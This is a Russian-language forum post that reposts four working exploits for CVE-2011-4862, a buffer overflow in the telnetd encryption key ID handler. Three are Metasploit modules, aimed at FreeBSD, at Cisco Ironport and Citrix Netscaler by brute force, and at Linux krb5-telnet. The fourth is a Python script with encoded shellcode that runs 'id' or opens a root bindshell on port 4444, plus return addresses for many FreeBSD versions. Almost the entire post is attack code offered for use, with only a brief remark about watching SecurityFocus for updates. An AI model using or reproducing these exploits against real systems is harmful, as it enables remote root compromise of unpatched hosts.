Показать сообщение отдельно
Старый 31.03.2012, 03:33   #9
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

http://www.securityfocus.com/bid/51182/exploit

Updated: Mar 30 2012 06:00AM


1------------------------------------------------------------------------------------------------------------------


Цитата:
#
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Telnet
include Msf::Exploit::BruteTargets

def initialize(info = {})
super(update_info(info,
'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the encryption option handler of the
FreeBSD telnet service.
},
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,
'Platform' => 'bsd',
'Payload' =>
{
'Space' => 128,
'BadChars' => "\x00",
},

'Targets' =>
[
[ 'Automatic', { } ],
[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx
[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx
[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx
[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx
[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx
# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)
[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return
# Versions 5.2 and below do not support encyption
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 23 2011'))
end

def exploit_target(t)

connect
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
vprint_status(banner_sanitized)

enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\ x18\x19\xff\xf0"
enc_keyid = "\xff\xfa\x26\x07"
end_suboption = "\xff\xf0"

# Telnet protocol requires 0xff to be escaped with another
penc = payload.encoded.gsub("\xff", "\xff\xff")

key_id = Rex::Text.rand_text_alphanumeric(400)
key_id[ 0, 2] = "\xeb\x76"
key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
key_id[76, 4] = [ t['Ret'] ].pack("V")

# Some of these bytes can get mangled, jump over them
key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)

# Bounce to the real payload (avoid corruption)
key_id[120, 2] = "\xeb\x46"

# The actual payload
key_id[192, penc.length] = penc

# Create the Key ID command
sploit = enc_keyid + key_id + end_suboption

# Initiate encryption
sock.put(enc_init)

# Wait for a successful response
loop do
data = sock.get_once(-1, 5) rescue nil
if not data
raise RuntimeError, "This system does not support encryption"
end
break if data.index("\xff\xfa\x26\x02\x01")
end

# The first request smashes the pointer
print_status("Sending first payload")
sock.put(sploit)

# Make sure the server replied to the first request
data = sock.get_once(-1, 5)
unless data
print_status("Server did not respond to first payload")
return
end

# Some delay between each request seems necessary in some cases
::IO.select(nil, nil, nil, 0.5)

# The second request results in the pointer being called
print_status("Sending second payload...")
sock.put(sploit)

handler

::IO.select(nil, nil, nil, 0.5)
disconnect
end

end


2------------------------------------------------------------------------------------------------------------------



Цитата:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Brute

def initialize(info = {})
super(update_info(info,
'Name' => 'FreeBSD based telnetd encrypt_key_id brute force',
'Description' => %q{
This module exploits a buffer overflow in the encryption option handler of the
FreeBSD telnet service.
},
'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
'References' =>
[
['BID', '51182'],
['OSVDB', '78020'],
['CVE', '2011-4862'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,
'Payload' =>
{
'Space' => 128,
'BadChars' => "\x00",
},
'Platform' => [ 'bsd' ],
'Targets' =>
[
#
# specific targets
#
[ 'Cisco Ironport 7.x Bruteforce',
{
'Bruteforce' =>
{

'Start' => { 'Ret' => 0x0805cffd },
'Stop' => { 'Ret' => 0x0805aa00 },
'Step' => 8
}
}
],

[ 'Citrix Netscaler 9.x',
{
'Bruteforce' =>
{

'Start' => { 'Ret' => 0x0805bffd },
'Stop' => { 'Ret' => 0x08059000 },
'Step' => 8
}
}
],

[ 'Other FreeBSD based targets',
{
'Bruteforce' =>
{

'Start' => { 'Ret' => 0x0805fffd },
'Stop' => { 'Ret' => 0x08050000 },
'Step' => 8
}
}
],


],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 23 2011'))

register_options(
[
Opt::RPORT(23),
], self.class )
end

def brute_exploit(addrs)
curr_ret = addrs['Ret']
begin
connect

sock.get_once
print_status('Initiate encryption mode ...')

req = ''
req << "\xff\xfa\x26\x00\x01\x01\x12\x13"
req << "\x14\x15\x16\x17\x18\x19\xff\xf0"
req << "\x00"

sock.put(req)
sock.get_once
req = ''
print_status("Trying return address 0x%.8x..." % curr_ret )
print_status('Sending first payload ...')

req << "\xff\xfa\x26\x07"
req << "\x00"
req << make_nops(71)
penc = payload.encoded.gsub("\xff", "\xff\xff")
req << [curr_ret].pack('V')
req << [curr_ret].pack('V')

req << make_nops(128)
req << penc
req << "\x90\x90\x90\x90"
req << "\xff\xf0"
req << "\x00"

sock.put(req)
sock.get_once
print_status('Sending second payload ...')
sock.put(req)

disconnect
handler
rescue
end
end

end

3------------------------------------------------------------------------------------------------------------------


Цитата:
##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Telnet
include Msf::Exploit::BruteTargets

def initialize(info = {})
super(update_info(info,
'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the encryption option handler of the
Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions
use NetKit-derived telnet daemons, so this flaw only applies to a small subset of
Linux systems running telnetd.
},
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,
'Platform' => 'linux',
'Payload' =>
{
'Space' => 200,
'BadChars' => "\x00",
'DisableNops' => true,
},

'Targets' =>
[
[ 'Automatic', { } ],
[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 23 2011'))
end

def exploit_target(t)

connect
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
print_status(banner_sanitized) if datastore['VERBOSE']

enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\ x18\x19\xff\xf0"
enc_keyid = "\xff\xfa\x26\x07"
end_suboption = "\xff\xf0"

penc = payload.encoded.gsub("\xff", "\xff\xff")

key_id = Rex::Text.rand_text_alphanumeric(400)

key_id[ 0, 2] = "\xeb\x76"
key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
key_id[76, 4] = [ t['Ret'] ].pack("V")

# Some of these bytes can get mangled, jump over them
key_id[80,40] = "\x41" * 40

# Insert the real payload
key_id[120, penc.length] = penc

# Create the Key ID command
sploit = enc_keyid + key_id + end_suboption

# Initiate encryption
sock.put(enc_init)

# Wait for a successful response
loop do
data = sock.get_once(-1, 5) rescue nil
if not data
raise RuntimeError, "This system does not support encryption"
end
break if data.index("\xff\xfa\x26\x02\x01")
end

# The first request smashes the pointer
print_status("Sending first payload")
sock.put(sploit)

# Make sure the server replied to the first request
data = sock.get_once(-1, 5)
unless data
print_status("Server did not respond to first payload")
return
end

# Some delay between each request seems necessary in some cases
::IO.select(nil, nil, nil, 0.5)

# The second request results in the pointer being called
print_status("Sending second payload...")
sock.put(sploit)
handler

::IO.select(nil, nil, nil, 0.5)
disconnect
end

end

4------------------------------------------------------------------------------------------------------------------


Цитата:
#!/usr/bin/env python
# Checks/exploits CVE-2011-4862 (remote root in encryption supporting telnetd) in multiple FreeBSD versions.
# Author: Knull of http://leethack.info
# References:
# Metasploit module, http://www.metasploit.com/modules/exploit/freebsd/telnet/telnet_encrypt_keyid
# FreeBSD advisory, http://lists.freebsd.org/pipermail/freebsd-announce/2011-December/001398.html

import random, string, struct, socket, time, sys

def usage():

print "Usage: " + sys.argv[0] + " [Option] host\n\nOptions: \n -c\tcheck if telnetd is vulnerable and running as root (runs command `id` on host)\n -e\texploit host (opens a bindshell on port 4444)\n"

if len(sys.argv) == 3:
host = sys.argv[2].rstrip()
port = 23
if sys.argv[1] == '-c':
# slightly modified version of metasploits bsd/x86/exec:
#
# bsd/x86/exec - 71 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# AppendExit=false, CMD=id, PrependSetresuid=false,
# PrependSetuid=false, VERBOSE=false, PrependSetreuid=false
buf = "\xda\xd0\xb8\x7b\x91\x45\xc5\xd9\x74\x24\xf4\x5d\ x2b\xc9\xb1\x0c\x31\x45\x17\x03\x45\x17\x83\x96\x6 d\xa7\x30\x02\xb5\x70\x22\x80\xa1\xad\x37\x24\x32\ x27\x50\x76\x5a\x59\xb0\x05\xf2\xcd\xe1\xc6\x60\x6 7\x77\xfb\x37\x9f\x84\xfb\xb7\x5f\xe2\x9f\xb7\x08\ xa7\xd6\x59\xe4\x16\xbb\xc9\xc4\x19"
elif sys.argv[1] == '-e':
# slightly modified version of metasploits bsd/x86/shell_bind_tcp:
#
# bsd/x86/shell_bind_tcp - 100 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# AutoRunScript=, AppendExit=false, PrependSetresuid=false,
# InitialAutoRunScript=, PrependSetuid=false, LPORT=4444,
# VERBOSE=false, RHOST=, PrependSetreuid=false
buf = "\xda\xc8\xbe\x7b\xd4\xea\x14\xd9\x74\x24\xf4\x58\ x2b\xc9\xb1\x13\x31\x70\x18\x83\xc0\x04\x03\x70\x6 f\x36\x1f\x25\x4f\xe6\x88\xb9\x4d\x16\x15\xcf\xb6\ x48\xcf\xce\x52\x6b\x65\xc1\x12\x0a\xb4\x61\x05\x9 d\x16\x08\xc1\x45\x5a\x4c\x98\x31\x88\xfd\xf0\x70\ xd0\x4e\x1a\x46\x51\xfe\x72\x32\x08\xa7\xbf\x42\x5 3\x18\xdb\x3a\x5a\xf7\x4b\x92\x8d\x8b\xe3\x84\xfe\ x09\x9a\x3a\x88\x2d\x0c\x97\xd9\xe1\x1c\x2c\x13\x8 1"
else:
usage()
exit()
else:
usage()
exit()


socket.setdefaulttimeout(10)
rg = random.SystemRandom()
alnum = string.letters[0:52] + string.digits

def rand_alnumlst(length):
return list(''.join(rg.choice(alnum) for _ in range(length)))

enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\ x18\x19\xff\xf0"
enc_keyid = "\xff\xfa\x26\x07"
end_suboption = "\xff\xf0"

# ret values for multiple FreeBSD versions
rets = 0x0804a8a9, 0x0804a889, 0x0804a869, 0x08057bd0, 0x0804c4e0, 0x0804a5b4, 0x08052925, 0x0804cf31, 0x8059730
version = '8.2', '8.1', '8.0', '7.3/7.4', '7.0/7.1/7.2', '6.3/6.4', '6.0/6.1/6.2', '5.5', '5.3'

# display banner
print "Vulnerability checker/exploit for CVE-2011-4862 (FreeBSD telnetd encryption)"
print "by Knull, http://leethack.info\n"

count = 0
tried = 0

# loop through the ret's until one works
for ret in rets:

key_id = rand_alnumlst(400)
key_id[0:1] = "\xeb\x76"
key_id[72:75] = struct.pack('<I', ret - 20)
key_id[76:79] = struct.pack('<I', ret)
key_id[80:191] = rand_alnumlst(112)
key_id[120:121] = "\xeb\x46"
key_id[192:191+len(buf)] = buf

s = ''
for i in key_id:
s += ''.join(i)

sploit = enc_keyid + s + end_suboption

print "Trying FreeBSD " + version[count] + "...\n"

try:

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
sock.send(enc_init)
data = sock.recv(32)

sock.send(sploit)
data = sock.recv(32)
time.sleep(0.5)

if data:

sock.send(sploit)
time.sleep(0.5)

if sys.argv[1] == '-e':
tried = 1
sock.close()

elif sys.argv[1] == '-c':
result = sock.recv(128)
sock.close()

if result.find("root") != -1:
print host + " is vulnerable, result of command: id\n" + result
exit()

sock.close()

except socket.error:
pass

count+=1

if tried:
print "Sent payloads, check bindshell on " + host + ", port 4444\n"
В который раз убеждаюсь, что securityfocus надо смотреть постоянно, даже если название уязвимости кажется знакомым до боли, т.к. иногда таки проскакивает update

Последний раз редактировалось Pashkela; 31.03.2012 в 04:03..
Pashkela вне форума   Ответить с цитированием